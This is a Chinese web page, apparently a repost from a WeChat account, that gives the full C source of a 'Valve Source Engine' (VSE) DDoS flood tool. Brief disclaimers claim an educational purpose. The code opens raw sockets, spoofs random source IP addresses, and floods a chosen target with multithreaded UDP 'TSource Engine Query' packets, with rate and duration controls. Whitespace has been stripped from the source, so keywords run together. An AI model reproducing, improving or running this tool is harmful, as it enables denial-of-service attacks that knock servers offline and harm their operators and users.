请勿使用非法用途,初学者教育为目的#include <pthread.h>#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys/socket.h>#include <netinet/ip.h>#include <netinet/udp.h>#define MAX_PACKET_SIZE 4096#define PHI 0x9e3779b9staticunsignedlongint Q[4096], c = 362436;staticunsignedint floodport;volatileint limiter;volatileunsignedint pps;volatileunsignedint sleeptime = 100;voidinit_rand(unsignedlongint x){int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI;for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }}unsignedlongintrand_cmwc(void){unsignedlonglongint t, a = 18782LL;staticunsignedlongint i = 4095;unsignedlongint x, r = 0xfffffffe; i = (i + 1) & 4095; t = a * Q[i] + c; c = (t >> 32); x = t + c;if (x < c) { x++; c++; }return (Q[i] = r - x);}unsignedshortcsum(unsignedshort *buf, int count){registerunsignedlong sum = 0;while( count > 1 ) { sum += *buf++; count -= 2; }if(count > 0) { sum += *(unsignedchar *)buf; }while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }return (unsignedshort)(~sum);}voidsetup_ip_header(struct iphdr *iph){ iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 25; iph->id = htonl(54321); iph->frag_off = 0; iph->ttl = MAXTTL; iph->protocol = IPPROTO_UDP; iph->check = 0; iph->saddr = inet_addr("192.168.3.100");}voidsetup_udp_header(struct udphdr *udph){ udph->source = htons(27015); udph->dest = htons(27015); udph->check = 0;void *data = (void *)udph + sizeof(struct udphdr);memset(data, 0xFF, 4);strcpy(data+4, "TSource Engine Query"); udph->len=htons(sizeof(struct udphdr) + 25);}void *flood(void *par1){char *td = (char *)par1;char datagram[MAX_PACKET_SIZE];structiphdr *iph = (struct iphdr *)datagram;structudphdr *udph = (void *)iph + sizeof(struct iphdr);structsockaddr_insin;sin.sin_family = AF_INET;sin.sin_port = htons(17015);sin.sin_addr.s_addr = inet_addr(td);int s = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);if(s < 0){fprintf(stderr, "Could not open raw socket.n");exit(-1); }memset(datagram, 0, MAX_PACKET_SIZE); setup_ip_header(iph); setup_udp_header(udph); iph->daddr = sin.sin_addr.s_addr; iph->check = csum ((unsignedshort *) datagram, iph->tot_len);int tmp = 1;constint *val = &tmp;if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!n");exit(-1); } init_rand(time(NULL));registerunsignedint i; i = 0;while(1){ sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)); iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF); iph->id = htonl(rand_cmwc() & 0xFFFFFFFF); iph->check = csum ((unsignedshort *) datagram, iph->tot_len); pps++;if(i >= limiter) { i = 0; usleep(sleeptime); } i++; }}intmain(int argc, char *argv[ ]){if(argc < 5){fprintf(stderr, "Invalid parameters!n");fprintf(stdout, "Valve Source Engine Layer 7 by LSDEVnUsage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>n", argv[0]);exit(-1); }fprintf(stdout, "Setting up Sockets...n");int num_threads = atoi(argv[2]);int maxpps = atoi(argv[3]); limiter = 0; pps = 0;pthread_t thread[num_threads];int multiplier = 20;int i;for(i = 0;i<num_threads;i++){ pthread_create( &thread[i], NULL, &flood, (void *)argv[1]); }fprintf(stdout, "Starting Flood...n");for(i = 0;i<(atoi(argv[4])*multiplier);i++) { usleep((1000/multiplier)*1000);if((pps*multiplier) > maxpps) {if(1 > limiter) { sleeptime+=100; } else { limiter--; } } else { limiter++;if(sleeptime > 25) { sleeptime-=25; } else { sleeptime = 0; } } pps = 0; }return0;}原文始发于微信公众号(7维空间):神秘的ddos之VSE攻击的脚本源码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论